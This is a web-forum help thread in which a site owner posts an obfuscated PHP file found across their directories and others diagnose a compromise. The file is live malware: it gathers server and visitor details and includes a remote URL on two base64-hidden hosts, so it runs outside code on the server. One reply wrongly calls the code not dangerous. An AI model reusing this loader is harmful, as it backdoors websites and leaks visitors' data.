What is this?

[L.G.S]

In most of my folders I have a PHP file which has a few random numbers as the name and this as the content, and I have no idea where it comes from or what it does.

Code Select Expand

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?>


Anybody know?

[winrules]

I looks like you were hacked. I'd delete all those files immediately. Also check your .htaccess files.

[L.G.S]

OK thanks... I haven't noticed any changes to anything though, those files have been there for a few weeks at least.

**** sake, the files are in almost every directory on my site, and I have loads of folders..

One of my htaccess is:

Options -MultiViews
ErrorDocument 404 //web/160355.php


My host did change the 404 error page recently to their own one (if i dont have mine customised) could this be it?

[winrules]

That's probablly an infected file. I'd delete it. If you have a backup from before it happened I'd restore it.

[L.G.S]

infected file? Its in every directory :S

My host seem totally stupid about it, I emailed them and sent the info but they started going on about not worrying about their redirect page...

[Sarke]

Looks like it's meant to collect info about your server and the user and send it to either www3.phptags.ws or shop.vmarket.info

The code itself doesn't look to be dangerous, but the fact that someone put code on your server is.

[L.G.S]

turns out the problem was caused by permissions in SMF and the files were made by SMF, TP posted a solution